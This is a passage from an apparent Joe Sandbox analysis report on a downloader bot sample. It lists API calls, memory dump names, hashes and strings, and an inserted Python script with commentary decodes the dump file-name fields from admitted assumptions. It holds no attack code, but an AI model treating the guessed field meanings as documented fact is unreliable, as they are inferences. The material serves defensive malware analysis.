                                                • Opcode ID: bb8189504487f5a985e51ce05a45f2a6c514b1516119dd71c496efc00cac7e49
                                                • Instruction ID: b6c6b2cb5f3e4505e2b1fe4d94ac0cdd1de82ae269b8b9d365b9aaad1755d673
                                                • Opcode Fuzzy Hash: bb8189504487f5a985e51ce05a45f2a6c514b1516119dd71c496efc00cac7e49
                                                • Instruction Fuzzy Hash: A1112B22A1C56282F7748B3190006792271EB82754F085131DAAD97EF6DE39E8808744
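The dotted file names in the Memory Dump Source block are not explained anywhere on the page. As an added example (not part of the Joe Sandbox report or its tooling), the Python below parses the dump names quoted in that block for process 0xC and cross-checks them against the Offset and Snapshot File lines: every region must belong to the same PID and iteration, the snapshot name must encode that same PID/iteration/base, and the source region must sit inside the dumped image. The field meanings (PID, iteration, base address, page protection, memory type) are this example's assumptions, inferred from the values lining up with winnt.h constants and with the `hcaresult_12_2_7ff658e20000_...` snapshot name; the numeric ID column and the two remaining fields are treated as opaque.

```python
import re
from dataclasses import dataclass

# Dump names copied from the report's "Memory Dump Source" block for process 0xC
# (the php_bot_downloader_v2 image). Only the strings come from the page; the
# meaning assigned to each dotted field is this example's assumption.
SOURCE_DUMP = "0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp"
ASSOCIATED_DUMPS = [
    "0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp",
    "0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp",
    "0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp",
    "0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp",
    "0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp",
]
IMAGE_OFFSET = 0x00007FF658E20000   # "Offset:" line of the same block
SNAPSHOT_FILE = "hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd"

# winnt.h page-protection constants; assumed to be what field 5 encodes.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# MEMORY_BASIC_INFORMATION.Type constants; assumed to be what field 7 encodes.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_DUMP_RE = re.compile(
    r"^(?P<pid>[0-9A-F]{8})\.(?P<iteration>[0-9A-F]{8})\.(?P<dump_id>\d+)"
    r"\.(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<f6>[0-9A-F]{8})"
    r"\.(?P<mem_type>[0-9A-F]{8})\.(?P<f8>[0-9A-F]{8})\.sdmp$"
)
# Snapshot names look like hcaresult_<pid>_<iteration>_<base>_<label>.jbxd (assumed).
_SNAPSHOT_RE = re.compile(r"^hcaresult_(?P<pid>\d+)_(?P<iteration>\d+)_(?P<base>[0-9a-f]+)_")


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    iteration: int
    dump_id: int      # opaque per-dump identifier
    base: int         # virtual address of the dumped region
    protect: int      # page protection of the region
    mem_type: int     # MEM_IMAGE / MEM_MAPPED / MEM_PRIVATE

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECTION.get(self.protect, f"UNKNOWN(0x{self.protect:X})")

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"UNKNOWN(0x{self.mem_type:X})")

    @property
    def executable(self) -> bool:
        return self.protect in (0x10, 0x20, 0x40, 0x80)


def parse_dump_name(name: str) -> DumpRegion:
    """Split one .sdmp file name into its fields; raises on anything else."""
    m = _DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    return DumpRegion(
        pid=int(m["pid"], 16), iteration=int(m["iteration"], 16),
        dump_id=int(m["dump_id"]), base=int(m["base"], 16),
        protect=int(m["protect"], 16), mem_type=int(m["mem_type"], 16),
    )


def check_dump_block(source: str, associated: list, image_offset: int, snapshot: str) -> dict:
    """Cross-check one 'Memory Dump Source' block and return the findings."""
    src = parse_dump_name(source)
    regions = [src] + [parse_dump_name(a) for a in associated]
    snap = _SNAPSHOT_RE.match(snapshot)
    if not snap:
        raise ValueError(f"unrecognised snapshot name: {snapshot!r}")
    return {
        "pid": src.pid,
        # All regions must come from the same process and analysis iteration.
        "same_process": all(r.pid == src.pid and r.iteration == src.iteration for r in regions),
        # The IDA snapshot must describe the same PID/iteration/image base.
        "snapshot_matches": (int(snap["pid"]) == src.pid
                             and int(snap["iteration"]) == src.iteration
                             and int(snap["base"], 16) == image_offset),
        # The PE header region (image base) should be among the dumps.
        "image_offset_dumped": any(r.base == image_offset for r in regions),
        # RVA of the region holding the analysed code, relative to the image base.
        "source_rva": src.base - image_offset,
        "source_executable": src.executable,
        "all_image": all(r.mem_type == 0x1000000 for r in regions),
        "region_map": {f"0x{r.base:X}": r.protect_name
                       for r in sorted(regions, key=lambda r: r.base)},
    }


if __name__ == "__main__":
    for key, value in check_dump_block(SOURCE_DUMP, ASSOCIATED_DUMPS, IMAGE_OFFSET, SNAPSHOT_FILE).items():
        print(f"{key}: {value}")
```

For this block the checks all come back consistent: PID 12 in both the dump names and the snapshot name, the header region at the image base dumped read-only, the analysed code at RVA 0x1000 in an execute-read region, and every region tagged as image memory, which is what "based on PE: true" implies.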
                                                APIs
                                                  • Part of subcall function 00007FF658E3BF24: GetLastError.KERNEL32 ref: 00007FF658E3BF33
                                                  • Part of subcall function 00007FF658E3BF24: SetLastError.KERNEL32 ref: 00007FF658E3BFD1
                                                • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF658E461E3,?,00000000,00000092,?,?,00000000,?,00007FF658E3A2C1), ref: 00007FF658E45B8A
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2417226690-0
                                                • Opcode ID: 951fbc0144a62e947e75b3a87fb31fcb36c33691a4992eb0475a1d0e2da3f676
                                                • Instruction ID: 608b4528ef304b55841e7c376f70f51b0ea40eb38a3dadd2bc867f76c6455788
                                                • Opcode Fuzzy Hash: 951fbc0144a62e947e75b3a87fb31fcb36c33691a4992eb0475a1d0e2da3f676
                                                • Instruction Fuzzy Hash: E001B562E0829686E7144F35E4407B976F1EBC07A4F499231D6AD97AE4CFB89886C708
                                                APIs
                                                • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF658E3C611,?,?,?,?,?,?,?,?,00000000,00007FF658E45088), ref: 00007FF658E3C2FB
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2099609381-0
                                                • Opcode ID: f39889105c39c1e7d9cdfb83f93b998eaff1662254749335195303e6102d8e5c
                                                • Instruction ID: 55db8c06d2a59c46bf9472b50a850040522a4f6955f8695ed6bafed66e2e0c16
                                                • Opcode Fuzzy Hash: f39889105c39c1e7d9cdfb83f93b998eaff1662254749335195303e6102d8e5c
                                                • Instruction Fuzzy Hash: FFF04672A08B5183E6009B76F8911A963B1FB997C0F5C9135EA4DE3B64DE3CE8518308
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: 8e49f534ba95581dd22a75685f66825aeb5385678599c58abc7a6036454363c2
                                                • Instruction ID: bae1d8f1487f033c83fa3ca3aa436f8d01b0dbd0c5c3157fc74c1014c4956269
                                                • Opcode Fuzzy Hash: 8e49f534ba95581dd22a75685f66825aeb5385678599c58abc7a6036454363c2
                                                • Instruction Fuzzy Hash: F5B09224E17A16C2EA092B726C4631422B87F88782F8C8038C14CE1720EF3C24A58704
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 60b6fb8d0248c970776ccc8624822a80e785400b24caab2435ad90ec9a6ba0a7
                                                • Instruction ID: 32ca55e5547577bbc5e8bbb4ba0f4a319793ac00b84927a1f821fc0ba4aa5192
                                                • Opcode Fuzzy Hash: 60b6fb8d0248c970776ccc8624822a80e785400b24caab2435ad90ec9a6ba0a7
                                                • Instruction Fuzzy Hash: 5DF06271B192A5CEDFA99F39B84262A77E0E748380F948039D68DC3F14DA3C90609F08
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 95e507c8ea33960a97f08222a6a90f76330df96898f3661f46b3fbdcd566cc28
                                                • Instruction ID: cd7287b9e2100a812c849d81c5c4fe32be10fdf0a6564ba095d0b82c0b668c86
                                                • Opcode Fuzzy Hash: 95e507c8ea33960a97f08222a6a90f76330df96898f3661f46b3fbdcd566cc28
                                                • Instruction Fuzzy Hash: EDA00121A0C82AD0F7448B61A8500342230AB90301B580031D14EA69A89E7DA4808208
                                                APIs
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CADB
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CAFA
                                                  • Part of subcall function 00007FF658E3C328: GetProcAddress.KERNEL32(?,?,00000006,00007FF658E3C72A,?,?,?,00007FF658E3C0EA,?,?,?,00007FF658E35E2D), ref: 00007FF658E3C480
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CB19
                                                  • Part of subcall function 00007FF658E3C328: LoadLibraryExW.KERNEL32(?,?,00000006,00007FF658E3C72A,?,?,?,00007FF658E3C0EA,?,?,?,00007FF658E35E2D), ref: 00007FF658E3C3CB
                                                  • Part of subcall function 00007FF658E3C328: GetLastError.KERNEL32(?,?,00000006,00007FF658E3C72A,?,?,?,00007FF658E3C0EA,?,?,?,00007FF658E35E2D), ref: 00007FF658E3C3D9
                                                  • Part of subcall function 00007FF658E3C328: LoadLibraryExW.KERNEL32(?,?,00000006,00007FF658E3C72A,?,?,?,00007FF658E3C0EA,?,?,?,00007FF658E35E2D), ref: 00007FF658E3C41B
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CB38
                                                  • Part of subcall function 00007FF658E3C328: FreeLibrary.KERNEL32(?,?,00000006,00007FF658E3C72A,?,?,?,00007FF658E3C0EA,?,?,?,00007FF658E35E2D), ref: 00007FF658E3C454
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CB57
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CB76
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CB95
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CBB4
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CBD3
                                                • try_get_function.LIBVCRUNTIME ref: 00007FF658E3CBF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                • API String ID: 3255926029-3252031757
                                                • Opcode ID: b010464cf2b1cba93bad182734da8025cbabf81e56ab9118fdcaeaff9242ecd3
                                                • Instruction ID: 1f86c626bf18de415d3331364466c7b152ba1811edcd46ec2598609aa10a3a09
                                                • Opcode Fuzzy Hash: b010464cf2b1cba93bad182734da8025cbabf81e56ab9118fdcaeaff9242ecd3
                                                • Instruction Fuzzy Hash: 583181E5908B2BA0FA04DB70E9515E82731FF54318FC90473D10DB29B19F3CAA4AD349
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin__scrt_fastfail
                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                • API String ID: 2680415206-3242537097
                                                • Opcode ID: d05e834672c3922e5a6c897896d78d0ee0807681eb762845170bdc3133b728b2
                                                • Instruction ID: 0d043d0573b05ca8534ea1d9e069cbea241ba02efa480cef0f9aecf7bd7450ea
                                                • Opcode Fuzzy Hash: d05e834672c3922e5a6c897896d78d0ee0807681eb762845170bdc3133b728b2
                                                • Instruction Fuzzy Hash: 9B21F820B19B3BD1FA55AB75BC5527423B0AF85741F4C4435CA5EF2EA1EE3CB4498308
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                • String ID: bad locale name
                                                • API String ID: 3904239083-1405518554
                                                • Opcode ID: 4d20062005d52e6d3db2030ef939464a733f81348363e0549d74b71ef5b6912e
                                                • Instruction ID: 9c92ae374c3f88886ec5fafd9744ca1b0b8bb55f2b815c7a11868f5c8132253b
                                                • Opcode Fuzzy Hash: 4d20062005d52e6d3db2030ef939464a733f81348363e0549d74b71ef5b6912e
                                                • Instruction Fuzzy Hash: 09112151E6965782EE44E73AE88666E5360EFC2B84F482435F98F73B67DD3CD0114B08
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                • String ID: csm$csm$csm
                                                • API String ID: 3606184308-393685449
                                                • Opcode ID: a124b85dfb71e3b74eb00f91c3f92f93adecf0c1a6d71bf5cd3011c25a91d866
                                                • Instruction ID: 456abc6e59ca642859c885eef16c619be23957d0d359338f59d579d7c2b2e698
                                                • Opcode Fuzzy Hash: a124b85dfb71e3b74eb00f91c3f92f93adecf0c1a6d71bf5cd3011c25a91d866
                                                • Instruction Fuzzy Hash: 3AE16F32A087529AEB619B75D4413AD77B0FB85798F180135DE8DA7FA6CF38E890C704
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: _invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 3215553584-0
                                                • Opcode ID: 073ffab9575f921b19d5eca0bd6a1b02315b113ae5b68c4e01bf469d61ae1604
                                                • Instruction ID: 73db151616ada874f1ee5ebbb119c003af6adbdf858d11ddd4b8f229cb942d75
                                                • Opcode Fuzzy Hash: 073ffab9575f921b19d5eca0bd6a1b02315b113ae5b68c4e01bf469d61ae1604
                                                • Instruction Fuzzy Hash: 74C1A332A0C6A681EB619B35A4402BD67B0FB81B80F5D0131DA4EA7BB5DE7CFC55C708
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: char_traits
                                                • String ID:
                                                • API String ID: 1158913984-3916222277
                                                • Opcode ID: de8db9d032ffcfc8b79d9f3ae03ebbbacc1b6865db1827f2b6139635527112c9
                                                • Instruction ID: 951c7ba2acc1cd812d9132b96d49dd0afbf9adeab8b9912770a115230e81936b
                                                • Opcode Fuzzy Hash: de8db9d032ffcfc8b79d9f3ae03ebbbacc1b6865db1827f2b6139635527112c9
                                                • Instruction Fuzzy Hash: 4E712D22A0DA9685E660DB25EC417BEB7B0FB81740F580132E68ED7E9ADF3CD444CB14
                                                APIs
                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF658E332AA,?,?,?,00007FF658E32F20,?,?,?,?,00007FF658E2FA59), ref: 00007FF658E3307F
                                                • GetLastError.KERNEL32(?,?,?,00007FF658E332AA,?,?,?,00007FF658E32F20,?,?,?,?,00007FF658E2FA59), ref: 00007FF658E3308D
                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF658E332AA,?,?,?,00007FF658E32F20,?,?,?,?,00007FF658E2FA59), ref: 00007FF658E330B7
                                                • FreeLibrary.KERNEL32(?,?,?,00007FF658E332AA,?,?,?,00007FF658E32F20,?,?,?,?,00007FF658E2FA59), ref: 00007FF658E330FD
                                                • GetProcAddress.KERNEL32(?,?,?,00007FF658E332AA,?,?,?,00007FF658E32F20,?,?,?,?,00007FF658E2FA59), ref: 00007FF658E33109
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: 5899ebe8d8c7a3f7160a3d9b45089dab11f3e3eb393157d033fd784c249ca927
                                                • Instruction ID: b7f9fe1ffc2c8ef8f505de2bf34cc3c210122fde4feb9263caa9b81b32020caa
                                                • Opcode Fuzzy Hash: 5899ebe8d8c7a3f7160a3d9b45089dab11f3e3eb393157d033fd784c249ca927
                                                • Instruction Fuzzy Hash: 7E31E821B0966294FE629B76A80097523B4BF44BA0F4D0535DD1EA7BA4DF3CFC058708
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmp
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: a21c862472e3088139fc8571bc345ddbdf786caeb27319e9e41f84d8900d7b8b
                                                • Instruction ID: 0adeb9ca76d3e42a3af111bad5a3eadf210662e6ac5ce564b6ba26e8bb04219a
                                                • Opcode Fuzzy Hash: a21c862472e3088139fc8571bc345ddbdf786caeb27319e9e41f84d8900d7b8b
                                                • Instruction Fuzzy Hash: 53115421718B65C6E7508B62E85432976B0FBC9BE5F084234D9ADD7BA4DF3DD8048748
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2019170510.00007FF658E21000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF658E20000, based on PE: true
                                                • Associated: 0000000C.00000002.2019138076.00007FF658E20000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019211886.00007FF658E4B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019499545.00007FF658E5F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E62000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                • Associated: 0000000C.00000002.2019541766.00007FF658E66000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ff658e20000_php_bot_downloader_v2-AVERAGE-BOI-CLN.jbxd
                                                Similarity
                                                • API ID: Fgetc
                                                • String ID:
                                                • API String ID: 1720979605-0
                                                • Opcode ID: fb42830bdd064bb1acbce0b55d4d7959c793a1a6dabc3b39c22b22369a1dcea0
                                                • Instruction ID: d876d0316743eaa0b842944b0ae586c3b72e753cd46d85432c02cbfdc2fe1d8d
